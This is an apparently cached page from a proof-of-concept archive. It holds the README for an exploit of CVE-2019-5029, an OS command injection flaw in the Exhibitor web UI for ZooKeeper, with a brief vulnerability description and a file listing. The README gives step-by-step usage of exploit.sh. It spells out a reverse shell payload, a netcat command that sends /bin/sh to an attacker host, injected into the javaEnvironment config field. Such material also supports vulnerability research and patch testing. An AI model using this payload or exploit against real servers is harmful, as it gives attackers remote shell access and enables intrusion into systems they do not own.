Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-5029 PoC — Exhibitor 操作系统命令注入漏洞

Source
Associated Vulnerability
Title:Exhibitor 操作系统命令注入漏洞 (CVE-2019-5029)
Description:Exhibitor是一款用于ZooKeeper的协同处理实例监视、备份/恢复、清理和可视化的程序。 Exhibitor 1.0.9版本至1.7.1版本中的Config编辑器存在操作系统命令注入漏洞。攻击者可利用该漏洞执行任意命令。
Description
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
Readme
# Exhibitor-RCE
Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029

## Step 1:

$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/

## Step 2:

$ cd Exihibitor-RCE/

## Step 3 (optional):

You might need to edit json data payload in the script. To do that simply capture the request using burpsuite when comiting the changes in the config tab of exihibitor and copy pasting into the curl command in the script.

<div style="text-align:center;">
  <img src="https://raw.githubusercontent.com/thehunt1s0n/Exihibitor-RCE/main/media/burpsuite_capture.png" alt="gif 1" width="500"/>
</div>

Make sure to change the javaEnvironment with the following:

"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"


## Step 4:

./exploit.sh <host> <port> <attacker_host> <attacker_port>

Example:

$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080

![gif](https://raw.githubusercontent.com/thehunt1s0n/Exihibitor-RCE/main/media/Exihibitor_capture.gif)
File Snapshot

[4.0K] /data/pocs/c2a43d99eb3ef31848cad19aba41a5c216b60efe ├── [2.4K] exploit.sh ├── [4.0K] media │   ├── [ 83K] burpsuite_capture.png │   └── [654K] Exihibitor_capture.gif └── [ 967] README.md 1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.